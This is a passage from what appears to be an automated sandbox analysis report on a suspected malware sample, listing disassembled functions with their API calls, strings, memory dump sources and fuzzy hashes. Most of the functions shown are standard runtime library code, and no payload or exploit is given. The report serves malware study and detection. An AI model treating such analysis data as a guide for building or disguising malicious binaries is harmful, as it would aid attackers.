                                                                                                        • ', stored ', xrefs: 00A75AF2
                                                                                                        • NameValuePairs: type mismatch for ', xrefs: 00A75AD2
                                                                                                        • ', trying to retrieve ', xrefs: 00A75B83
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Exception@8Throw
                                                                                                        • String ID: ', stored '$', trying to retrieve '$NameValuePairs: type mismatch for '
                                                                                                        • API String ID: 2005118841-3022120042
                                                                                                        • Opcode ID: 9354ea2cb425003da41502ce03f31bcd62476db76b1f68116db6c7d9bb4ad9e6
                                                                                                        • Instruction ID: a61387f465210481b58052176421ebc82eeb8e563eeab835a1c535d86108f2ef
                                                                                                        • Opcode Fuzzy Hash: 9354ea2cb425003da41502ce03f31bcd62476db76b1f68116db6c7d9bb4ad9e6
                                                                                                        • Instruction Fuzzy Hash: 5011947290460CABCB10EF94DD41FCAB7FCEB05754F1085A6FD15A3690EB75AA08C7A0
                                                                                                        Function 00B443C9 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 34COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __EH_prolog3_catch.LIBCMT ref: 00B443D0
                                                                                                        • make_shared.LIBCPMT ref: 00B4441B
                                                                                                          • Part of subcall function 00B440B0: __EH_prolog3.LIBCMT ref: 00B440B7
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: H_prolog3H_prolog3_catchmake_shared
                                                                                                        • String ID: MOC$RCC
                                                                                                        • API String ID: 1798871530-2084237596
                                                                                                        • Opcode ID: b4ef2cc1f5d764c8c967561998ba01fd5100acc2f75b206942d14bb30c8e34e6
                                                                                                        • Instruction ID: 8898213a98888faad48442716249a118377f6f00a38d48c1dda1491e9781036f
                                                                                                        • Opcode Fuzzy Hash: b4ef2cc1f5d764c8c967561998ba01fd5100acc2f75b206942d14bb30c8e34e6
                                                                                                        • Instruction Fuzzy Hash: CFF03C70644168CFCB11AF68D4526AC3AF0EF56B00B9544E1F8014B325CF785F969BA2
                                                                                                        Function 00B06133 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00B06163
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00B06171
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Exception@8Throwstd::invalid_argument::invalid_argument
                                                                                                        • String ID: pScheduler$version
                                                                                                        • API String ID: 1687795959-3154422776
                                                                                                        • Opcode ID: b87ad0ae0476955de4e8397a68309d81e1a5e89bc7f8b029e3af338febc7dc95
                                                                                                        • Instruction ID: 67a3260c9ee4e3023673cdc61b56c5608a5a54ba56aedcc409e2467b47d1c55f
                                                                                                        • Opcode Fuzzy Hash: b87ad0ae0476955de4e8397a68309d81e1a5e89bc7f8b029e3af338febc7dc95
                                                                                                        • Instruction Fuzzy Hash: C5E08634A44208B6CF11FA60C84AFEC7BE8AB14709F0080D1BA11210E197B49699C641
                                                                                                        Function 00B1A2FA Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 21COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetLastError.KERNEL32(?,Dflt,00B19233,?,00B899F0,?,?,?,?,?,?,?), ref: 00B1A308
                                                                                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00B1A316
                                                                                                        • SetLastError.KERNEL32(00000000,?,?,?,?,?), ref: 00B1A31F
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast$Value___vcrt_
                                                                                                        • String ID: Dflt
                                                                                                        • API String ID: 483936075-3880269418
                                                                                                        • Opcode ID: ee9c3342f70d76dbefe1e197518fad486956a5dd7fbc1b0c75967f34584e07fd
                                                                                                        • Instruction ID: 74818945748a61eb6b601d708442fd1b89cd9297fe0955d44e6b8a7b0cf00d46
                                                                                                        • Opcode Fuzzy Hash: ee9c3342f70d76dbefe1e197518fad486956a5dd7fbc1b0c75967f34584e07fd
                                                                                                        • Instruction Fuzzy Hash: B1D01236615322578A105B74FC0D6E637E6E6D177331447B1F120C31E4DF7894469750
                                                                                                        Function 00B35DD8 Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: __alldvrm$_strrchr
                                                                                                        • String ID:
                                                                                                        • API String ID: 1036877536-0
                                                                                                        • Opcode ID: 0bbad52a81ebf957d6498de7c6c4cd56ac8fac2dd9ce91af280b7e57b28347ed
                                                                                                        • Instruction ID: 00064d9d622b611deb7761e81cfa435c38c6466ae704f6f287eb4fe2a3671aba
                                                                                                        • Opcode Fuzzy Hash: 0bbad52a81ebf957d6498de7c6c4cd56ac8fac2dd9ce91af280b7e57b28347ed
                                                                                                        • Instruction Fuzzy Hash: 34A14772A04796AFEB25CF28C8D27AEBBE5EF11350F3881E9E4859B281C6349D45C750
                                                                                                        Function 00AEC6B5 Relevance: 6.3, APIs: 4, Instructions: 289COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _strcspn$H_prolog3_ctype
                                                                                                        • String ID:
                                                                                                        • API String ID: 838279627-0
                                                                                                        • Opcode ID: f6463ed2d263c865f88dc73b718fc27aacde4cf89c1c4745935ee87d954df6b4
                                                                                                        • Instruction ID: bdc6a840d52966cbe30d813283785bf0404d0b296e434ada0d8de0f8a20a00ae
                                                                                                        • Opcode Fuzzy Hash: f6463ed2d263c865f88dc73b718fc27aacde4cf89c1c4745935ee87d954df6b4
                                                                                                        • Instruction Fuzzy Hash: D2B15975D002899FCF14DFA9C985AEEBBB9FF08320F144059F845AB251D734AE46CBA0
                                                                                                        Function 00AEC9CC Relevance: 6.3, APIs: 4, Instructions: 289COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _strcspn$H_prolog3_ctype
                                                                                                        • String ID:
                                                                                                        • API String ID: 838279627-0
                                                                                                        • Opcode ID: 458984adba9e6b59963ae660a7729760e6c985ca2942790f08b40c3ca312e05f
                                                                                                        • Instruction ID: a2f078941fb44d46b481a2669b806de9598847a1f28ce4889071b553015b0966
                                                                                                        • Opcode Fuzzy Hash: 458984adba9e6b59963ae660a7729760e6c985ca2942790f08b40c3ca312e05f
                                                                                                        • Instruction Fuzzy Hash: 95B17875D0028D9FDF10DFA9C985AEEBBB9FF48320F144159E805AB201D730AE46CBA1
                                                                                                        Function 00AE59E8 Relevance: 6.3, APIs: 4, Instructions: 281COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _strcspn$H_prolog3_ctype
                                                                                                        • String ID:
                                                                                                        • API String ID: 838279627-0
                                                                                                        • Opcode ID: 9739309195843d47bb6fb900082424f09a8a5f9f3dd4ac435ed331798c7199be
                                                                                                        • Instruction ID: a726768fb6ed7a9c2b8ce4855984d4394170fabbdb2f4a1eecbe69b37d4b9769
                                                                                                        • Opcode Fuzzy Hash: 9739309195843d47bb6fb900082424f09a8a5f9f3dd4ac435ed331798c7199be
                                                                                                        • Instruction Fuzzy Hash: 13B1ADB1D00689DFDF10DFA9D985AEEBBB9FF08304F244559E805AB211D770AE45CBA0
                                                                                                        Function 00B1A37F Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AdjustPointer
                                                                                                        • String ID:
                                                                                                        • API String ID: 1740715915-0
                                                                                                        • Opcode ID: 73684ac790696b2e46f6e5c5bdda7655b4735602fc4fc2a17bbe08c2c7e73f99
                                                                                                        • Instruction ID: c6bebc0eebf9cb15858e8d672e188c6b1963c01003c901c539be8d93811ff0bd
                                                                                                        • Opcode Fuzzy Hash: 73684ac790696b2e46f6e5c5bdda7655b4735602fc4fc2a17bbe08c2c7e73f99
                                                                                                        • Instruction Fuzzy Hash: 7B5101B26066029FDB299F54D885BFA77E4EF14310FA441ADE80687290DBB1FCC1D792
                                                                                                        Function 00B18CE6 Relevance: 6.1, APIs: 4, Instructions: 141COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: EqualOffsetTypeids
                                                                                                        • String ID:
                                                                                                        • API String ID: 1707706676-0
                                                                                                        • Opcode ID: 7eba31bc2cdc899ce0d39c1d43e6a64f477002fbbb014f00cff841445868ded1
                                                                                                        • Instruction ID: 3c4e8c9a9e234beafe7b5864c5619e68395aa09aaf49525234d928176200dcbc
                                                                                                        • Opcode Fuzzy Hash: 7eba31bc2cdc899ce0d39c1d43e6a64f477002fbbb014f00cff841445868ded1
                                                                                                        • Instruction Fuzzy Hash: 6F518B36A042099FCF11CF68D4809EEBBF5FF15310F9448DAD855A7291DB32AE85CB90
                                                                                                        Function 00B05963 Relevance: 6.1, APIs: 4, Instructions: 101COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • Concurrency::details::ResourceManager::InitializeRMBuffers.LIBCMT ref: 00B05976
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: BuffersConcurrency::details::InitializeManager::Resource
                                                                                                        • String ID:
                                                                                                        • API String ID: 3433162309-0
                                                                                                        • Opcode ID: c38975d1eaeb179f885bba939cb71da8ca37310a58839547d4482114b0546577
                                                                                                        • Instruction ID: 0adb5f746ad569646aec424cbbbc0e9ef8101d9a2cd6f29a978d806de470be76
                                                                                                        • Opcode Fuzzy Hash: c38975d1eaeb179f885bba939cb71da8ca37310a58839547d4482114b0546577
                                                                                                        • Instruction Fuzzy Hash: 7C311575A00709DFCB20DF94C4C4AAE7BF9FB44314F1405EAE945AB686D630AA45DFA0
                                                                                                        Function 00B00050 Relevance: 6.1, APIs: 4, Instructions: 82COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00AFFCB0: WaitForSingleObjectEx.KERNEL32(00000000,000000FF,00000000,?,AE695AF0,AE695AF0,?,?,?,00000000,00000000,AE695AF0,AE695AF0), ref: 00AFFCF5
                                                                                                        • ReleaseSemaphore.KERNEL32(?,?,00000000,AE695AF0,?,AE695AF0,AE695AF0,?,00B4BF00,000000FF,?,00AFFD89), ref: 00B000A0
                                                                                                        • ReleaseSemaphore.KERNEL32(?,?,00000000,?,00AFFD89), ref: 00B000C1
                                                                                                        • CloseHandle.KERNEL32(?,?,AE695AF0,AE695AF0), ref: 00B000F2
                                                                                                        • SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00B50140,000000FF), ref: 00B0012C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ReleaseSemaphore$CloseEventHandleObjectSingleWait
                                                                                                        • String ID:
                                                                                                        • API String ID: 568734227-0
                                                                                                        • Opcode ID: c70e8e0570af623b87c7afd93f91026f60e82170cef1b80e0c1a436e85bbe739
                                                                                                        • Instruction ID: a982ddc269bdfb4326b4b41cebb1901d063e092624c2b235b23754d004d2615c
                                                                                                        • Opcode Fuzzy Hash: c70e8e0570af623b87c7afd93f91026f60e82170cef1b80e0c1a436e85bbe739
                                                                                                        • Instruction Fuzzy Hash: A531BD306403099FDB10EF68C884B26BBE8FB04724F1445A9EC18DB296DB36DD15CB90
                                                                                                        Function 00B00750 Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • EnterCriticalSection.KERNEL32(00B987E8,?,?,00AD48EF,00B97168,00B51FF0,00000001), ref: 00B0075A
                                                                                                        • LeaveCriticalSection.KERNEL32(00B987E8,?,00AD48EF,00B97168,00B51FF0,00000001), ref: 00B0078D
                                                                                                        • SetEvent.KERNEL32(00000000,00B97168,00B51FF0,00000001), ref: 00B0081B
                                                                                                        • ResetEvent.KERNEL32 ref: 00B00827
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CriticalEventSection$EnterLeaveReset
                                                                                                        • String ID:
                                                                                                        • API String ID: 3553466030-0
                                                                                                        • Opcode ID: 849e559f40c5503dd2cf8234869c9f33ccc5003824a343041ac3e7eabce03773
                                                                                                        • Instruction ID: 051181ac0c087e12c7bbcc8ade92ac89ca562b95731d2f2e9694cad014fc29a7
                                                                                                        • Opcode Fuzzy Hash: 849e559f40c5503dd2cf8234869c9f33ccc5003824a343041ac3e7eabce03773
                                                                                                        • Instruction Fuzzy Hash: 29014F35600610DBCB05AF64FD9CAA57BE9FB0A74274440AAE802A7370CF746D14CB94
                                                                                                        Function 00B0D2DC Relevance: 6.0, APIs: 4, Instructions: 40COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 00B0D30E
                                                                                                        • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 00B0D31E
                                                                                                        • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 00B0D32E
                                                                                                        • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 00B0D342
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Compare_exchange_acquire_4std::_
                                                                                                        • String ID:
                                                                                                        • API String ID: 3973403980-0
                                                                                                        • Opcode ID: c3e98d520ee154351f5eab327fd590a9931b1f5e0108a4d6b1addf49a0b8f4a6
                                                                                                        • Instruction ID: 74950a3cda7115a5c0859b52a6435be8141ced475716bef8c83610f05d4c03f5
                                                                                                        • Opcode Fuzzy Hash: c3e98d520ee154351f5eab327fd590a9931b1f5e0108a4d6b1addf49a0b8f4a6
                                                                                                        • Instruction Fuzzy Hash: AA016432400109ABCF129ED4ED829AD3FA2FB19310B048091FD28850F0DB32DA70EB86
                                                                                                        Function 00B0D34C Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 00B0D355
                                                                                                          • Part of subcall function 00B01F1F: Concurrency::details::SchedulerBase::GetDefaultScheduler.LIBCONCRT ref: 00B08146
                                                                                                        • Concurrency::details::ContextBase::CancelCollection.LIBCONCRT ref: 00B0D379
                                                                                                        • Concurrency::details::_TaskCollectionBase::_FinishCancelState.LIBCMT ref: 00B0D38C
                                                                                                        • Concurrency::details::ContextBase::CancelStealers.LIBCMT ref: 00B0D395
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
